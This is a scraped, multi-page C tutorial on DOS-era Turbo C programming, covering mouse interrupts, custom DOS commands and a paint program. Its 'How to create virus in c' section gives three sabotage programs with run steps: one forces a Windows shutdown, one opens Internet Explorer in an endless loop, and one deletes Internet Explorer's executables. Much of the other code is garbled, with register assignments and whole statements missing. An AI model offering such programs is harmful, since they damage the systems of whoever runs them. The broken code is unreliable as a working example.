mouse programming in c

Mouse programming in c (1) Write a c program which restricts the movement of pointer? Answer: //restrict the x and y coordinate #include <dos.h> #include <stdio.h> void main() { union REGS i,o; //show mouse pointer; int86(0x33,&i,&o); //x coordinate restriction;; i.x.dx=300; int86(0x33,&i,&o); //y coordinate restriction;; i.x.dx=250; int86(0x33,&i,&o); getch(); } (2) Write c program which display position of pointer in (x coordinate, y coordinate)? Answer: #include<dos.h> #include<stdio.h> void main() { union REGS i,o; int x,y,k; //show mouse pointer;

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Page 1: Mouse programming in c

Mouse programming in c(1) Write a c program which restricts the movement of pointer?Answer://restrict the x and y coordinate#include <dos.h>#include <stdio.h>void main(){

union REGS i,o;//show mouse pointer;int86(0x33,&i,&o);

//x coordinate;;i.x.dx=300;int86(0x33,&i,&o);

//y coordinate;;i.x.dx=250;int86(0x33,&i,&o);getch();

}(2) Write c program which display position of pointer in (x coordinate, y coordinate)?Answer:#include<dos.h>#include<stdio.h>void main(){

union REGS i,o;int x,y,k;//show mouse;int86(0x33,&i,&o);

while(!kbhit()) //its value will false when we hit key in the key board

{; //get mouse;y=o.x.dx;

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clrscr();printf("(%d , %d)",x,y);delay(250);int86(0x33,&i,&o);}getch();

#include <dos.h>#include <stdio.h>

void main()


union REGS i,o;;




Explanation: To write such program you must have one interrupt table. Following table is only small part of interrupt table.

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To see complete interrupt table click here

This table consists for column. They are:

(1) Input

(2) Output

(3) Service number

(4) Purpose

Now look at the first row of interrupt table. To show the mouse pointer assign ax equal to 1 i.e. service number while ax is define in the WORDREGS

struct WORDREGS {

unsigned int ax, bx, cx, dx;

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unsigned int si, di, cflag, flags;


And WORDRGS is define in the union REGS

union REGS {

struct WORDREGS x;

struct BYTEREGS h;


So to access the structure member ax first declare a variable of REGS i.e.

REGS i, o;

Note: We generally use i for input and o for output

To access the ax write (We are using structure variable i because ax is input

(See in the interrupt table)

So to show mouse pointer assign the value of service number to it:;

To provide this information to microprocessorwe use int86 function. It has three parameters

1. Interrupt number i.e. 0x33

2. union REGS *inputregiste i.e. &i

3. union REGS *outputregiste i.e. &o;

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So write: int86 (0x33, &i, &o);

How to create virus in c?Create simple virus by c programming language.(Only for study purpose)(1) Write c program which shutdown the window operating system?Answer:Step 1: Write the following program in TURBO C.void main (void){system("shutdown -s");}Step 2: Save the above file. Let file name is close.c Step 3: Only compile the above program.Step 4: Now close the turbo c compiler and open that directory in window operating system where you have saved the close.c (default directory c:\tc\bin) Step 5: Double click on its .exe file (close.exe)After some time your window operating system will shutdown.(2) Write a c program such that when we will click on its .exe file then it will open internet explorer at infinite times?Answer:Step 1: Write the following program in TURBO C.void main (void){

for(; ;){system("c:\\progra~1\\intern~1\\iexplore.exe");}

}Step 2: Save the above file. Let file name is internet.c Step 3: Only compile the above program.Step 4: Now close the turbo c compiler and open that directory in window operating system where you have saved the internet.c (default directory c:\tc\bin) Step 5: Double click on its .exe file (internet.exe)

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(3) Write a c program which delete the all the .exe file of internet explorer so that internet explorer will not work?Answer:Step 1: Write the following program in TURBO C.void main(void){

system("cd c:\\progra~1\\intern~1");system(“del *.exe”);system(“cls”);

}Step 2: Save the above file. Let file name is delete.c Step 3: Only compile the above program.Step 4: Now close the turbo c compiler and open that directory in window operating system where you have saved the delete.c (default directory c:\tc\bin) Step 5: Double click on its .exe file (delete.exe)

How to create dos command in c?(1) Create a dos command: type by c program.

Answer:Step 1: Write following code.#include <stdio.h>void main(int count,char * argv[]){

int i;FILE *ptr;char *str;char ch;if(count==1){printf("The syntax of the command is incorrect.\

n");}for(i=1;i<count;i++){ptr=fopen(argv[i],"r");if(ptr==NULL){printf("The system cannot find the file


Page 7: Mouse programming in c

printf("\nError occurred while procesing : %s.\n",argv[i]);


}Step 2: Save the as open.c (You can give any name)Step 3: Compile and execute the file.Step 4: Write click on My computer of Window XP operating system and select properties.Step 5: Select Advanced -> Environment VariablesStep 6: You will find following window:Click on new button (Button inside the red box)

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Step 7: Write following:Variable name: pathVariable value: c:\tc\bin\open.c (the path where you have saved)

Step 8: Open command prompt and write open then file name and press enter button.

Create dir command in cAnswer:Step 1: Write following code.#include <stdio.h>#include <dos.h>void main(int count,char *argv[]){

Page 9: Mouse programming in c

struct find_t q ;int a;if(count==1)argv[1]="*.*";a = _dos_findfirst(argv[1],1,&q);if(a==0){while (!a){printf(" %s\n",;a = _dos_findnext(&q);}}else{printf("File not found");}}Step 2: Save the as open.c (You can give any name)Step 3: Compile and execute the file.Step 4: Write click on My computer of Window XP operating system and select properties.Step 5: Select Advanced -> Environment VariablesStep 6: You will find following window:Click on new button (Button inside the red box)

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Step 7: Write following:Variable name: pathVariable value: c:\tc\bin\open.c (the path where you have saved)

Page 11: Mouse programming in c

Step 8: Open command prompt and write list and press enter button

Write the c program to switch the 256 color graphics mode ?.Ans: #include<stdio.h>#include<dos.h>void main(){int x,y,b;union REGS i,o;i.h.ah=0;;int86(0x10,&i,&o); getch();}

Write a c program to create a directory in current working directory?Ans: #include<stdio.h>#include<dos.h>void main()

Page 12: Mouse programming in c

{union REGS i,o;i.h.ah=0x39;i.x.dx="ravan";int86(0x21,&i,&o); getch();}

Write a c programming code to create simple paint brush software.#include<dos.h>#include<stdio.h>#include<graphics.h>#include<stdlib.h>void main(){

int x,y,b,px,py,c,p,s,cl;int d=0,m;union REGS i,o;initgraph(&d,&m,"c:\tc");;int86(0x33,&i,&o);;;i.x.dx=450;int86(0x33,&i,&o);printf("Brush style insert number from 0 to 5 :

");scanf("%d",&p);printf("Brush size insert number from 1 to 7 :

");scanf("%d",&s);printf("Brush color insert number from 1 to 16 :

");scanf("%d",&cl);clrscr();cleardevice();printf("\t\t**********DRAW IMAGE************");while(!kbhit()){;b=o.x.bx;

Page 13: Mouse programming in c;y=o.x.dx;px=x;py=y;int86(0x33,&i,&o);if(cl==16){c=random(16);}else{c=cl;}setcolor(c);if(b==1){;int86(0x33,&i,&o);;y=o.x.dx;b=o.x.bx;switch(p){case 1:circle(px,py,s);break;case 2:ellipse(px,py,0,270,s,s+2);break;case 3:fillellipse(px,py,s+2,s);break;case 4:rectangle(px,py,x,y);break;case 5:sector(px,py,30,120,s,s);break;default:line(px,py,x,y);}}}getch();restorecrtmode();closegraph();
